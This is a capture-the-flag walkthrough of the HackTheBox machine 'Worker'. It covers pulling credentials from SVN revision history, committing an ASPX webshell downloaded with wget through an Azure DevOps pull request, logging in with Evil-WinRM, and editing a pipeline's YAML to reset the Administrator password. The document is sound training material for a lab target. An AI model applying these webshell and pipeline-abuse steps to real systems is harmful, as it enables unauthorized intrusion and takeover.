Today we are going to crack a machine called the Worker. It was created by ekenas. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
- Network Scanning
- Nmap Scan
- Enumeration
- Browsing HTTP Service
- Enumerating SVN
- Editing Hosts into /etc/hosts
- Enumerating HTTP Service
- Enumerating Source Code
- Enumerating SVN Revisions
- Extracting Nathen Credentials
- Login as Nathen
- Exploitation
- Enumerating Azure DevOps
- Enumerating Repos and Branches
- Creating New Branch
- Exploit File Upload
- Download aspx webshell
- Commit Merge Request
- Creating a Pull Request
- Approve Pull Request
- Completing Pull Request
- Accessing the Web Shell
- Enumerating SVN repos
- Getting Credentials for robisl
- Logging as robisl with Evil-WinRM
- Reading User Flag
- Privilege Escalation
- Enumerating PartsUnlimited Project
- Creating Pipeline
- Edit pipeline YAML to change Admin Password
- Save and Run Pipeline
- Logging as Administrator
- Reading the Root Flag
Walkthrough
Network Scanning
To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.
IP Address assigned: 10.129.2.29
Now that we have the IP Address. We need to enumerate open ports on the machine. For this, we will be running a nmap scan.
The Nmap Version scan quickly gave us some great information. It positively informed that the following ports and services are running: HTTP (80), SVN (3690).
Enumeration
Since we have the HTTP Service, we try to browse the application on port 80 with the help of web browser. It is a basic IIS Server Welcome Page.
We try to get a local copy of the repo from the server with the help of the checkout command. As wanted to access files from the SVN server, checkout is the best way to go.
svn checkout svn://10.129.2.29 |
We got a moved.txt file that tells us about the devops.worker.htb host and the directory that svn copied we got another host by the name of dimension.worker.htb.
We add both the hosts into the /etc/hosts file in order to access them.
nano /etc/hosts 10.129.2.29 devops.worker.htb dimension.worker.htb |
Starting with the dimension.worker.htb, we open it into the Web Browser to find a static HTML website with a bunch of broken links.
We enumerated the source code to find another bunch of hosts as shown in the image below.
We checked the previous revisions of the svn and found that the last revisions were 5. We check other revisions and end up on revision 2. Here we found the credentials for the user Nathen.
svn checkout svn://10.129.2.29:3690 svn diff -r2 $user = "nathen" $plain = "wendel98" |
When we tried to visit the devops.worker.htb it required a set of credentials. We enter Nathen’s credentials.
Exploitation
We end up with an Azure DevOps instance for a SmartHotel360 Project. We enumerate the Repos and various branches into the project.
We tried creating a New Branch in the Project.
We named the branch we create ignite. The branch is supposed to be based on master. Click on Create Branch here
This led us to the Upload File options in the Branch Menu as shown in the image.
As this is a Windows Based Machine with IIS Server with .NET Application, we decided to download an aspxshell. It downloads as a text file. Rename it to use.
wget https://dl.packetstormsecurity.net/UNIX/penetration/aspxshell.aspx.txt mv aspxshell.aspx.txt aspxshell.aspx |
As we upload the file, we now have to Commit this branch in order to merge it with the Master Branch. Add Branch Name same as we created earlier and add 1 into the Work Item linking. This is done to link the Ignite Branch to commit with the master branch.
After this is done, we need to create a pull request in order to merge the commit. This can be done by clicking the Create a pull request option as shown in the image below.
If ever worked with Git or similar environment, we know that there is a reviewer that needs to approve the commit. We add the Nathen or as the name showed in the Project “Nathalie Henley” into the reviewer so that we can approve it. After doing this click on Create Button to move forward
We went back to the branches and commits to see that we have a pull request to approve that we just added. Click on Approve button as shown in the image below.
After approval, we need to Complete the pull request in order to execute the payload on the target machine.
This will show that we can complete the merge of this ignite branch with the malicious file. Click on Complete merge to move forward.
We can see that the merge is complete. Now we need to access the shell that we upload.
We can check if we have the shell uploaded by checking the master branch inside the spectral directory, we see that now it contains the shell we uploaded earlier.
We add the spectral.worker.htb into the /etc/hosts to access the webshell that we just uploaded. It is one of the links that we discovered earlier in the source code of the dimension.worker.htb
nano /etc/hosts 10.129.2.29 devops.worker.htb dimension.worker.htb spectral.worker.htb |
Upon browsing the webshell in the browser we see that we can execute a bunch of commands and access the directories and upload files as well. Let’s enumerate!
Upon going through the svn repositories we find a conf directory inside it we found the passwd file.
The exist a bunch of users here. We tried and found that robisl works.
We used the evil-WinRM to connect to the target machine as robisl user.
Here we have the user flag.
evil-winrm -i 10.129.2.29 -u robisl -p wolves11 cd .. cd Desktop ls type user.txt |
Privilege Escalation
These credentials also work with the devops host that we logged in as Nathen earlier.
Here we see that we have another project called PartsUnlimited. Let’s check it out
Through enumeration, we see that this project only has one repo. It has awfully a lot of files and directories, but we didn’t find anything of interest. Inside the Project settings in the General Section and Security Subsection, we found that robisl is a Build Administrator. That means that we can use it to build a pipeline. We click on New Pipeline button.
It asks us for the location of our YAML code. We choose the Azure Repost Git option.
We choose the PartsUnlimited repository
Here we see a bunch of different pipelines. We choose the Stater Pipeline as it was one of the simplest of all.
We got a YAML pipeline file as shown in the image below. It has a script parameter which has the command of Hello World.
It also mentions the pool. As we don’t have any pool. Let’s remove it. Then we replace the script with the net use command to reset the password for the Administrator to something simple such as [email protected] We chose such password in order to comply to the Password Polices.
Let’s save and run this pipeline into the repository. Click on the create new branch to commit and start a pull request as committing directly to the master branch won’t get the same reaction as we need.
After working for a while and committing all the code including our net use command inside the yml file we can assume that the command is executed and the password for the Administrator is changed.
Let’s login using the Evil-WinRM and read the root flag to conclude the machine.
evil-winrm -i 10.129.2.29 -u Administrator -p Password@1 cd .. cd Desktop ls type root.txt |
Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on Twitter and LinkedIn